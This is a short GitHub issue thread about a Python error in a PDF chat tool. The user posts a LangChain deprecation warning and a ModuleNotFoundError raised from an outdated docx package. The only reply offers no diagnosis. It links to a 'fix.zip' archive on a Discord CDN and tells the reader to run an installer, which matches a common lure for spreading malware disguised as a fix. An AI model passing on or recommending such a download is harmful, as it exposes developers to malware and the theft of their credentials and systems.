### ISSUE TITLE
error

### ISSUE THREAD

**Issue by 3xploiton3** [adityashakya836/AI-Powered-PDF-chat-tool#1]
python app.py

```
/home/user/Repo/AI-Powered-PDF-chat-tool/app.py:7: LangChainDeprecationWarning: Importing FAISS from langchain.vectorstores is deprecated. Please replace deprecated imports:

>> from langchain.vectorstores import FAISS

with new imports of:

>> from langchain_community.vectorstores import FAISS
You can use the langchain cli to **automatically** upgrade many imports. Please see documentation here <https://python.langchain.com/v0.2/docs/versions/v0_2/>
  from langchain.vectorstores import FAISS
Traceback (most recent call last):
  File "/home/user/Repo/AI-Powered-PDF-chat-tool/app.py", line 11, in <module>
    from docx import Document
  File "/home/user/.venv/lib/python3.12/site-packages/docx.py", line 30, in <module>
    from exceptions import PendingDeprecationWarning
ModuleNotFoundError: No module named 'exceptions'
```

**Comment by zawa999** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer
